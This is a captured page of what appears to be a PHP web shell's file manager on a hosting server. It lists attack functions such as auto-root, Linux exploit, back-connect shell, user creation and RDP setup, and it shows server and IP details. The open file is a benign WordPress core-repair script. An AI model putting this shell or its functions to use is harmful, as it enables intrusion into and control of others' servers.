Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.217.7
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
security-scan /
[ HOME SHELL ]
Name
Size
Permission
Action
quarantine
[ DIR ]
drwxr-xr-x
reports
[ DIR ]
drwxr-xr-x
tools
[ DIR ]
drwxr-xr-x
adminer.php
0
B
-rw-r--r--
full-wp-audit.sh
2.52
KB
-rwxr-xr-x
repair-wordpress-core.sh
663
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : repair-wordpress-core.sh
#!/bin/sh WPCLI=/home/verseaumee/security-scan/tools/wp-cli.phar LIST=/home/verseaumee/security-scan/reports/wordpress-roots.txt while IFS= read -r site; do echo "========================================" echo "SITE: $site" VER=$(grep -m1 "\$wp_version =" "$site/wp-includes/version.php" 2>/dev/null \ | sed "s/.*'\([^']*\)'.*/\1/") echo "VERSION: $VER" if [ -n "$VER" ]; then php "$WPCLI" core download \ --path="$site" \ --version="$VER" \ --force \ --skip-content else echo "SKIPPED - VERSION NOT DETECTED" fi done < "$LIST" echo "CORE REPAIR FINISHED"
Close